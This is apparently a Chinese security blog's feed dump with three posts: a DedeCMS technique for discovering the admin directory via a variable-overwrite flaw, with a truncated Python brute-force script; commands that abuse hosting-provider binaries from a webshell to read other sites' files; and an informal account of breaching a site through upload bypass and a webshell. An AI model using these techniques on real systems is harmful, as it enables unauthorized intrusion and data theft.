目录 – ChaBug安全 / 一个分享知识、结识伙伴、资源共享的博客 Mon, 13 Aug 2018 15:45:32 +0000 zh-CN hourly 1 https://wordpress.org/?v=5.5.5 解决历史难题-DEDECMS织梦找后台目录 /web/363.html Mon, 26 Feb 2018 21:15:00 +0000 /?p=253

原文 https://xianzhi.aliyun.com/forum/topic/2064

利用限制

仅针对windows系统

进入正题

首先看核心文件common.inc.php 大概148行左右

if($_FILES)
{
    require_once(DEDEINC.'/uploadsafe.inc.php');
}

uploadsafe.inc.php

if( preg_match('#^(cfg_|GLOBALS)#', $_key) )
{
    exit('Request var not allow for uploadsafe!');
}
$$_key = $_FILES[$_key]['tmp_name']; //获取temp_name
${$_key.'_name'} = $_FILES[$_key]['name'];
${$_key.'_type'} = $_FILES[$_key]['type'] = preg_replace('#[^0-9a-z\./]#i', '', $_FILES[$_key]['type']);
${$_key.'_size'} = $_FILES[$_key]['size'] = preg_replace('#[^0-9]#','',$_FILES[$_key]['size']);
if(!empty(${$_key.'_name'}) && (preg_match("#\.(".$cfg_not_allowall.")$#i",${$_key.'_name'}) || !preg_match("#\.#", ${$_key.'_name'})) )
{
    if(!defined('DEDEADMIN'))
    {
        exit('Not Admin Upload filetype not allow !');
    }
}
if(empty(${$_key.'_size'}))
{
    ${$_key.'_size'} = @filesize($$_key);
}
$imtypes = array
(
    "image/pjpeg", "image/jpeg", "image/gif", "image/png",
    "image/xpng", "image/wbmp", "image/bmp"
);
if(in_array(strtolower(trim(${$_key.'_type'})), $imtypes))
{
    $image_dd = @getimagesize($$_key);
    //问题就在这里,获取文件的size,获取不到说明不是图片或者图片不存在,不存就exit upload.... ,利用这个逻辑猜目录的前提是目录内有图片格式的文件。
    if (!is_array($image_dd))
    {
        exit('Upload filetype not allow !');
    }
}
......

注意$$_key这一句,变量$key取自于$_FILE,由于$_FILE可控自然$key也可控,此处理论上是可以覆盖任意变量,但是前面有个正则判断不能出现cfg_|GLOBALS。(但是应该还可以覆盖其他变量此处感觉还可以深挖)

本人出发点是找个可以利用

![3.png][3]
# Python版本

!/usr/bin/env python3

fixed bug by ChaBug

author = Mochazz

import requests
import itertools
characters = “abcdefghijklmnopqrstuvwxyz0123456789_!~@$-+=()” #加上了乱七八糟的符号
back_dir = “”
flag = 0
url = “http://192.168.1.9/tags.php”
data = {

"_FILES[mochazz][tmp_name]" : "./{p}
]]> 星外虚拟主机跨web目录文件读取技巧 /web/344.html Sun, 28 Jan 2018 11:40:15 +0000 /?p=113 星外虚拟主机跨目录读取文件漏洞,需要一定条件。

详细说明:

问题发生在以下文件,这些文件都没有严格的设置执行权限,当前的IIS用户能够顺利的利用它们执行命令:

c:\windows\7i24IISLOG.exe
c:\windows\7i24IISLOG2.exe
c:\windows\7i24IISLOG3.exe
c:\windows\7i24IISLOG4.exe
c:\windows\7i24tool.exe
c:\windows\rsb.exe

其中的7i24IISLOG.exe其实就是LogParserLogParser是一款强大日志分析工具,下面利用它来列web目录:

在 webshell中

CmdPath:
c:\windows\7i24IISLOG
Argument:
“select top 100 path from e:\host\*.*” -i:FS -rtp:-1

下面读取文件内容:

c:\windows\7i24IISLOG
“select text from e:\host\0233ab\web\admin.php” -i:textline -rtp:-1

7i24IISLOG3.exe能够打包ISO文件,利用它同样的也可以列出目录文件信息:

CmdPath:
c:\windows\7i24IISLOG3
Argument:
e:\host\0233ab\web\ c:\windows\temp\123.rar

同样的还有rbs.exe

CmdPath:
c:\windows\rbs -r -v 024dbjj
Argument:
e:\host\0233ab\web\*.*
]]> 有缘的某个目录之爆菊 /web/340.html Fri, 26 Jan 2018 14:08:00 +0000 /?p=43 image
能忍?????
不存在的。

二话不说拿起nmap就是扫
image
只对这个端口产生性趣
image
脑海浮现弱口令,然而未果。
接着去问我表哥,他说这版本有漏洞。
搜了一手百度之后
image
这尼玛怎么用?无果
抽根烟冷静冷静…顺便扫起了目录
image
image
直接注册特么一个。
找啊找啊找,
咦~~~TMLGB
这就十分有灵性了。
image
开Burp
截断 解析漏洞无果后,想起了一手双文件上传。
然后cer直接绕过
image
菜刀
image

翻了翻配置文件 是root权限,以后再提权

]]>